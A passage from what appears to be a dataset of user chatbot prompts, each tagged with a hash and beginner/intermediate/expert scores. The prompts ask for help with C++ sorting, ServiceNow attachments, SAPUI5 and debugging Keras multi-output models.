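    FROM emp
    WHERE salary < (SELECT MAX(salary) FROM emp)
"""
print(con.execute(query).fetchone())  # (200,)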
|
f2c6ce198ca6e87d9ce2bb293cbb2f49
|
{
"intermediate": 0.40115365386009216,
"beginner": 0.25919076800346375,
"expert": 0.3396556079387665
}
|
46,732
|
#include <bits/stdc++.h>
#define M 100002
using namespace std;
int dem[M];
struct xau{
string x;
int vt;
};
xau s[M];
int demso(xau a){
int res=0;
if(a.x.size()<1)return 0;
for(int i=0;i<a.x.size();i++)
if(a.x[i]>='0'&&a.x[i]<='9') res++;
return res;
}
bool cmp (xau a,xau b){
if(demso(a)<demso(b)|| demso(a)==demso(b)&& a.vt>b.vt) return true;
return false;}
int main()
{
ios_base::sync_with_stdio(false);
cin.tie(0); cout.tie(0);
freopen("BAI3.INP", "r",stdin);
freopen("BAI3.OUT", "w",stdout);
int n;
cin>>n;
for(int i=1;i<=n;i++) {cin>>s[i].x; s[i].vt=i;}
sort (s+1,s+n+1,cmp);
for(int i=1;i<=n;i++) cout << s[i].x << '\n';  // print the strings in sorted order
return 0;
}
|
01beba47a4d28c16a1f9fec10fec2015
|
{
"intermediate": 0.3091809153556824,
"beginner": 0.4919096827507019,
"expert": 0.19890941679477692
}
|
46,733
|
I've a catalog item which will generate 6 SC tasks. For one of the SC tasks, the user should not be able to close the task without an attachment. How can I proceed with a solution for this? Please help me with any scripts.
|
58727a2adeb20719473d041d64dbb10c
|
{
"intermediate": 0.27944621443748474,
"beginner": 0.3443250358104706,
"expert": 0.37622880935668945
}
|
46,734
|
I want a list action (declarative action), on click of which I will get a popup, and in the popup I will be able to attach a document in the workspace view.
After submitting, the attached documents should get attached to multiple records.
If I could get any code, it would be a very big help for me.
|
3a578d3699ac80c8eb3865234480f413
|
{
"intermediate": 0.38570186495780945,
"beginner": 0.3150084912776947,
"expert": 0.29928967356681824
}
|
46,735
|
how can I make my c++ program on linux output a final message before termination if an access violation happens?
|
115d4b025107ecaa127074155280ccb3
|
{
"intermediate": 0.5213168263435364,
"beginner": 0.1934683918952942,
"expert": 0.28521469235420227
}
|
46,736
|
I have the following code:
input_shape = (72, 6427)
inputs = Input(shape=(input_shape,))
x = Dense(6427, activation='relu', input_shape=(input_shape,)) (inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
and im getting this error:
{
"name": "ValueError",
"message": "Invalid dtype: tuple",
"stack": "---------------------------------------------------------------------------
ValueError Traceback (most recent call last)
Cell In[8], line 3
1 input_shape = (70, 6427)
----> 3 inputs = Input(shape=(input_shape,))
6 x = Dense(6427, activation='relu', input_shape=(input_shape,)) (inputs)
7 x = Dropout(0.25) (x)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\layers\\core\\input_layer.py:143, in Input(shape, batch_size, dtype, sparse, batch_shape, name, tensor)
89 @keras_export([\"keras.layers.Input\", \"keras.Input\"])
90 def Input(
91 shape=None,
(...)
97 tensor=None,
98 ):
99 \"\"\"Used to instantiate a Keras tensor.
100
101 A Keras tensor is a symbolic tensor-like object, which we augment with
(...)
141
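A likely cause, sketched under the assumption of Keras 3: input_shape is already a tuple, so shape=(input_shape,) wraps it once more into ((72, 6427),), and Keras rejects the inner tuple as an "Invalid dtype". Passing the tuple directly avoids the error (whether (72, 6427) is the right per-sample shape is a separate question).
from tensorflow.keras.layers import Input

input_shape = (72, 6427)           # shape taken from the question
inputs = Input(shape=input_shape)  # not Input(shape=(input_shape,))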
|
49bf33e7da0d8570c73c456d4627dec9
|
{
"intermediate": 0.3208302855491638,
"beginner": 0.38221466541290283,
"expert": 0.29695501923561096
}
|
46,737
|
I want a list action (declarative action), on click of which I will get a popup, and in the popup I will be able to attach a document in the workspace view.
After submitting, the attached documents should get attached to multiple records.
If I could get any code, it would be a very big help for me.
|
3b91272c69f95f8aa98352ee064352be
|
{
"intermediate": 0.38570186495780945,
"beginner": 0.3150084912776947,
"expert": 0.29928967356681824
}
|
46,738
|
my code:
# %%
import os
import numpy as np
import pandas as pd
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from tensorflow.keras.layers import Input, Dropout
from tensorflow.keras import Model
# %%
def data_generator(file_paths, batch_size, train=True, scaler=None):
while True: # Loop forever so the generator never terminates
# Shuffle file paths to ensure random distribution of data across files
np.random.shuffle(file_paths)
for file_path in file_paths:
data = pd.read_csv(file_path)
# Split features and labels
X = data.drop([
'Date', 'Symbol',
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1).values
y_high_1d = data['y_High_1d'].values
y_low_1d = data['y_Low_1d'].values
y_priority_1d = data['y_Priority_1d'].values
y_high_2d = data['y_High_2d'].values
y_low_2d = data['y_Low_2d'].values
y_priority_2d = data['y_Priority_2d'].values
y_high_3d = data['y_High_3d'].values
y_low_3d = data['y_Low_3d'].values
y_priority_3d = data['y_Priority_3d'].values
y_high_5d = data['y_High_5d'].values
y_low_5d = data['y_Low_5d'].values
y_priority_5d = data['y_Priority_5d'].values
# Optionally, apply preprocessing here (e.g., Scaler transform)
if scaler is not None and train:
X = scaler.fit_transform(X)
elif scaler is not None:
X = scaler.transform(X)
# Splitting data into batches
for i in range(0, len(data), batch_size):
end = i + batch_size
X_batch = X[i:end]
y_high_batch_1d = y_high_1d[i:end]
y_low_batch_1d = y_low_1d[i:end]
y_priority_batch_1d = y_priority_1d[i:end]
y_high_batch_2d = y_high_2d[i:end]
y_low_batch_2d = y_low_2d[i:end]
y_priority_batch_2d = y_priority_2d[i:end]
y_high_batch_3d = y_high_3d[i:end]
y_low_batch_3d = y_low_3d[i:end]
y_priority_batch_3d = y_priority_3d[i:end]
y_high_batch_5d = y_high_5d[i:end]
y_low_batch_5d = y_low_5d[i:end]
y_priority_batch_5d = y_priority_5d[i:end]
yield X_batch, [y_high_batch_1d, y_low_batch_1d,y_priority_batch_1d,
y_high_batch_2d, y_low_batch_2d,y_priority_batch_2d,
y_high_batch_3d, y_low_batch_3d, y_priority_batch_3d,
y_high_batch_5d, y_low_batch_5d, y_priority_batch_5d]
# %%
dataset_dir = r'C:\Users\arisa\Desktop\day_spot'
file_paths = [os.path.join(dataset_dir, file_name) for file_name in os.listdir(dataset_dir)]
train_files, val_files = train_test_split(file_paths, test_size=0.06, random_state=42)
batch_size = 72
# %%
# Optional: Initialize a scaler for data normalization
scaler = StandardScaler()
# %%
# Create data generators
train_gen = data_generator(train_files, batch_size, train=True, scaler=scaler)
val_gen = data_generator(val_files, batch_size, train=False, scaler=scaler)
# %%
input_shape = (72, 6427)
inputs = Input(shape=input_shape) # Corrected the input shape specification
x = Dense(6427, activation='relu')(inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
# %%
import os
import pandas as pd
def count_samples(file_paths):
total_samples = 0
for file_path in file_paths:
df = pd.read_csv(file_path)
samples = len(df)
total_samples += samples
return total_samples
number_of_training_samples = count_samples(train_files)
number_of_validation_samples = count_samples(val_files)
print(f'Number of training samples: {number_of_training_samples}')
print(f'Number of validation samples: {number_of_validation_samples}')
# %%
# Assuming you have the data_generator function as defined in your question
# Generate a small batch for testing
test_gen = data_generator(train_files, batch_size=72, train=True, scaler=StandardScaler())
# Fetch one batch of data
X_batch, y_batch_list = next(test_gen)
# Check the shape of the features (X)
print("Shape of X_batch:", X_batch.shape)
# Since y_batch_list is a list of outputs (high, low, priority for different days), inspect each
for i, y_batch in enumerate(y_batch_list):
print(f"Shape of y_batch {i}:", y_batch.shape)
# %%
# You'll need to determine steps_per_epoch and validation_steps based on your data size and batch size
steps_per_epoch = np.ceil(number_of_training_samples / batch_size) # Replace number_of_training_samples
validation_steps = np.ceil(number_of_validation_samples / batch_size) # Replace number_of_validation_samples
model.fit(train_gen,
steps_per_epoch=steps_per_epoch,
validation_data=val_gen,
validation_steps=validation_steps,
epochs=1000)
error:
{
"name": "TypeError",
"message": "`output_signature` must contain objects that are subclass of `tf.TypeSpec` but found <class 'list'> which is not.",
"stack": "---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
Cell In[18], line 5
2 steps_per_epoch = np.ceil(number_of_training_samples / batch_size) # Replace number_of_training_samples
3 validation_steps = np.ceil(number_of_validation_samples / batch_size) # Replace number_of_validation_samples
----> 5 model.fit(train_gen,
6 steps_per_epoch=steps_per_epoch,
7 validation_data=val_gen,
8 validation_steps=validation_steps,
9 epochs=1000)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\utils\\traceback_utils.py:122, in filter_traceback.<locals>.error_handler(*args, **kwargs)
119 filtered_tb = _process_traceback_frames(e.__traceback__)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\data\\ops\\from_generator_op.py:124, in _from_generator(generator, output_types, output_shapes, args, output_signature, name)
122 for spec in nest.flatten(output_signature):
123 if not isinstance(spec, type_spec.TypeSpec):
--> 124 raise TypeError(f\"`output_signature` must contain objects that are \"
125 f\"subclass of `tf.TypeSpec` but found {type(spec)} \"
126 f\"which is not.\")
127 else:
128 if output_types is None:
TypeError: `output_signature` must contain objects that are subclass of `tf.TypeSpec` but found <class 'list'> which is not."
}
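A self-contained sketch of the structural point, assuming TF 2.x: Keras validates the nest structure of each generator element, so multi-output labels must be yielded as a tuple (matching a tuple signature), not a Python list, and each label array must match the declared rank (e.g. reshape (batch,) to (batch, 1)). Toy shapes stand in for the real ones.
import numpy as np
import tensorflow as tf

def gen():
    X = np.zeros((4, 3), dtype=np.float32)
    y1 = np.zeros((4, 1), dtype=np.float32)
    y2 = np.zeros((4, 1), dtype=np.float32)
    yield X, (y1, y2)  # a tuple, not a list

sig = (
    tf.TensorSpec(shape=(None, 3), dtype=tf.float32),
    (
        tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
        tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
    ),
)
ds = tf.data.Dataset.from_generator(gen, output_signature=sig)
for X, (y1, y2) in ds.take(1):
    print(X.shape, y1.shape, y2.shape)  # (4, 3) (4, 1) (4, 1)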
|
90378e60391293c4993a0a2f6efccf05
|
{
"intermediate": 0.4520384967327118,
"beginner": 0.3773055672645569,
"expert": 0.1706559956073761
}
|
46,739
|
hello
|
441700cbb20740a220e682023c9b5b84
|
{
"intermediate": 0.32064199447631836,
"beginner": 0.28176039457321167,
"expert": 0.39759764075279236
}
|
46,740
|
Hi there, please be a senior sapui5 developer and answer my following questions with working code examples.
|
1d3941712ab0a982f2950190e0704aa9
|
{
"intermediate": 0.42116406559944153,
"beginner": 0.2712341248989105,
"expert": 0.3076017498970032
}
|
46,741
|
my code:
# %%
import os
import numpy as np
import pandas as pd
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from tensorflow.keras.layers import Input, Dropout
from tensorflow.keras import Model
# %%
def data_generator(file_paths, batch_size, train=True, scaler=None):
while True: # Loop forever so the generator never terminates
# Shuffle file paths to ensure random distribution of data across files
np.random.shuffle(file_paths)
for file_path in file_paths:
data = pd.read_csv(file_path)
# Split features and labels
X = data.drop([
'Date', 'Symbol',
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1).values
y_high_1d = data['y_High_1d'].values
y_low_1d = data['y_Low_1d'].values
y_priority_1d = data['y_Priority_1d'].values
y_high_2d = data['y_High_2d'].values
y_low_2d = data['y_Low_2d'].values
y_priority_2d = data['y_Priority_2d'].values
y_high_3d = data['y_High_3d'].values
y_low_3d = data['y_Low_3d'].values
y_priority_3d = data['y_Priority_3d'].values
y_high_5d = data['y_High_5d'].values
y_low_5d = data['y_Low_5d'].values
y_priority_5d = data['y_Priority_5d'].values
# Optionally, apply preprocessing here (e.g., Scaler transform)
if scaler is not None and train:
X = scaler.fit_transform(X)
elif scaler is not None:
X = scaler.transform(X)
# Splitting data into batches
for i in range(0, len(data), batch_size):
end = i + batch_size
X_batch = X[i:end]
y_high_batch_1d = y_high_1d[i:end]
y_low_batch_1d = y_low_1d[i:end]
y_priority_batch_1d = y_priority_1d[i:end]
y_high_batch_2d = y_high_2d[i:end]
y_low_batch_2d = y_low_2d[i:end]
y_priority_batch_2d = y_priority_2d[i:end]
y_high_batch_3d = y_high_3d[i:end]
y_low_batch_3d = y_low_3d[i:end]
y_priority_batch_3d = y_priority_3d[i:end]
y_high_batch_5d = y_high_5d[i:end]
y_low_batch_5d = y_low_5d[i:end]
y_priority_batch_5d = y_priority_5d[i:end]
yield X_batch, [y_high_batch_1d, y_low_batch_1d,y_priority_batch_1d,
y_high_batch_2d, y_low_batch_2d,y_priority_batch_2d,
y_high_batch_3d, y_low_batch_3d, y_priority_batch_3d,
y_high_batch_5d, y_low_batch_5d, y_priority_batch_5d]
# %%
dataset_dir = r'C:\Users\arisa\Desktop\day_spot'
file_paths = [os.path.join(dataset_dir, file_name) for file_name in os.listdir(dataset_dir)]
train_files, val_files = train_test_split(file_paths, test_size=0.06, random_state=42)
batch_size = 72
# %%
# Optional: Initialize a scaler for data normalization
scaler = StandardScaler()
# %%
# Create data generators
train_gen = data_generator(train_files, batch_size, train=True, scaler=scaler)
val_gen = data_generator(val_files, batch_size, train=False, scaler=scaler)
# %%
input_shape = (72, 6427)
inputs = Input(shape=input_shape) # Corrected the input shape specification
x = Dense(6427, activation='relu')(inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
# %%
import os
import pandas as pd
def count_samples(file_paths):
total_samples = 0
for file_path in file_paths:
df = pd.read_csv(file_path)
samples = len(df)
total_samples += samples
return total_samples
number_of_training_samples = count_samples(train_files)
number_of_validation_samples = count_samples(val_files)
print(f'Number of training samples: {number_of_training_samples}')
print(f'Number of validation samples: {number_of_validation_samples}')
# %%
import tensorflow as tf
output_signature = (
tf.TensorSpec(shape=(None, X_batch.shape[1]), dtype=tf.float32), # for X_batch
(
tf.TensorSpec(shape=(None, 1), dtype=tf.float32), # For each y_batch
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
)
)
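# NOTE: X_batch is local to the generator and is not defined in this cell;
# the feature count would normally be supplied directly (e.g. a hypothetical
# n_features = 6427). Each label batch from the generator is also 1-D, so
# tf.TensorSpec(shape=(None,), dtype=tf.float32) matches it more closely
# than shape=(None, 1).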
train_dataset = tf.data.Dataset.from_generator(
lambda: train_gen,
output_signature=output_signature
)
val_dataset = tf.data.Dataset.from_generator(
lambda: val_gen,
output_signature=output_signature
)
# %%
# You'll need to determine steps_per_epoch and validation_steps based on your data size and batch size
steps_per_epoch = np.ceil(number_of_training_samples / batch_size).astype(int) # Replace number_of_training_samples
validation_steps = np.ceil(number_of_validation_samples / batch_size).astype(int) # Replace number_of_validation_samples
# model.fit(train_gen,
# steps_per_epoch=steps_per_epoch,
# validation_data=val_gen,
# validation_steps=validation_steps,
# epochs=1000)
# Then use these datasets in your model.fit call
model.fit(train_dataset,
steps_per_epoch=steps_per_epoch,
validation_data=val_dataset,
validation_steps=validation_steps,
epochs=1000)
error:
{
"name": "InvalidArgumentError",
"message": "Graph execution error:
Detected at node PyFunc defined at (most recent call last):
<stack traces unavailable>
TypeError: `generator` yielded an element that did not match the expected structure. The expected structure was (tf.float32, (tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32)), but the yielded element was (array([[-0.39491499, -0.40790701, -0.37860123, ..., 0. ,
0. , 0. ],
[-0.387636 , -0.40270658, -0.36623326, ..., 0. ,
0. , 0. ],
[-0.37878316, -0.3817255 , -0.36090224, ..., 0. ,
0. , 0. ],
...,
[-0.52475656, -0.52626182, -0.50974435, ..., 0. ,
0. , 0. ],
[-0.51747756, -0.52410992, -0.52168584, ..., 0. ,
0. , 0. ],
[-0.5349865 , -0.54096651, -0.52360501, ..., 0. ,
0. , 0. ]]), [array([ 1.88098495, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 0.48143054, 3.14661134, 0.27275827, 1.09270356,
1.1967617 , 1.36746143, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 0.57430007, 4.045605 , 0. , 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 1.39458573, 1.54723127,
0. , 1.61366872, 2.4262607 , 3.27255727, 2.55102041,
2.03117619, 2.6119403 , 3.37806571, 0.36798528, 2.41134752,
3.83536015, 4.19296664, 3.51339482, 5.09009009, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.04295533, 3.21543408,
5.70910739, 2.98313878, 1.13350126, 3.37781485, 3.61201299,
1.90555095, 3.76229158, 1.95295162, 0.65387969, 1.0521701 ,
3.44827586, 0.92470277, 1.36503743, 6.97368421, 4.68364832,
2.41014799, 0.3776752 , 4.12684622, 1.22466216, 1.92560175,
2.47131509, 4.88021295, 1.13636364, 2.78276481, 1.63355408,
1.51724138, 6.37413395]), array([ -1.19699042, -1.85247558, -4.78061559, -0.94466937,
-2.002002 , -3.58579088, -1.89133425, -0.82987552,
-4.90964882, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -2.43654822, -0.99315068, -5.15641114,
-3.51758794, -1.25045973, -2.2411953 , -1.11550918,
-11.94404591, -0.90337785, -7.99695354, -1.64068909,
-1.79153094, -22.43485342, -1.99335548, -3.04471931,
-0.46750818, -4.63821892, -2.50354275, -2.51865672,
-0.78667284, -3.31186753, -0.80378251, -1.87090739,
-3.69702435, -3.20597277, -1.66666667, -1.69565217,
-0.99050764, -5.91420242, -0.56374675, -9.66494845,
-0.68902159, -3.94200272, -0.51880674, -3.61041142,
-0.54211843, -2.5974026 , -4.97100249, -3.8477982 ,
-1.42032845, -2.83347864, -2.41122315, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.03944125,
-1.18393235, -4.1963911 , -1.39009557, -5.40540541,
-1.48796499, -2.33892321, -0.88731145, -3.71503497,
-0.53859964, -4.63576159, -1.10344828, -1.61662818]), array([0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1, 0,
1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1,
0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1,
0, 1, 0, 1, 1, 0], dtype=int64), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 0.27275827, 1.33944307,
1.75994368, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 2.18319886, 5.0903901 , 3.36605891, 2.55102041,
3.92064242, 4.19776119, 3.37806571, 0.36798528, 4.96453901,
8.09167446, 6.26690712, 3.51339482, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.04295533, 7.16582453,
7.92931581, 4.15045396, 4.07220823, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.48557479, 0.65387969, 1.27137221,
3.44827586, 1.36503743, 7.39762219, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 1.92560175,
4.32480141, 4.88021295, 1.13636364, 3.32136445, 1.63355408,
5.88505747, 6.37413395]), array([ -1.19699042, -2.05456383, -4.78061559, -0.94466937,
-4.004004 , -4.39008043, -1.89133425, -3.5615491 ,
-6.17115581, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -2.43654822, -5.51369863, -7.59711241,
-3.6252692 , -1.25045973, -2.2411953 , -11.6588701 ,
-11.94404591, -5.1060487 , -8.6824067 , -1.64068909,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.73021749, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -1.69565217,
-6.76846884, -5.91420242, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.73497622, -3.61041142,
-0.54211843, -6.89935065, -6.83512842, -5.04489098,
-1.42032845, -2.96425458, -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.03944125,
-3.46723044, -4.74192195, -2.69331017, -5.40540541,
-3.15098468, -2.33892321, -2.26264419, -3.71503497,
-3.05206463, -5.03311258, -2.06896552, -1.61662818]), array([0., 1., 1., 0., 1., 1., 0., 1., 1., 0., 0., 0., 0., 1., 1., 1., 0.,
